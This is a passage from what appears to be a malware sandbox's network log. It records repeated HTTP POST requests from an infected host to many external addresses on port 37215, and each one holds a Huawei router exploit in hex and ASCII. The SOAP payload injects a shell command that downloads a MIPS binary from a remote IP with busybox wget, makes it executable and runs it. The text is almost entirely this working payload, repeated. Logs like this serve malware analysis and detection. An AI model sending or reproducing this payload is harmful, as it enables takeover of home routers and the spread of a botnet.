20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            829192.168.2.1339666156.35.194.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.823755026 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            830192.168.2.134945041.91.3.3537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.824796915 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            831192.168.2.1356588197.48.146.21937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.825900078 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            832192.168.2.1342044197.251.250.14737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.827128887 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            833192.168.2.1355338197.51.133.8437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.828946114 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            834192.168.2.133717441.72.64.16537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.830775023 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            835192.168.2.134901441.139.202.22337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.831855059 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            836192.168.2.1356460156.146.144.20937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.833195925 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            837192.168.2.1339336156.66.48.15737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.834263086 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            838192.168.2.1345676156.30.176.17337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.835521936 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            839192.168.2.1333064156.2.52.20937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.836582899 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
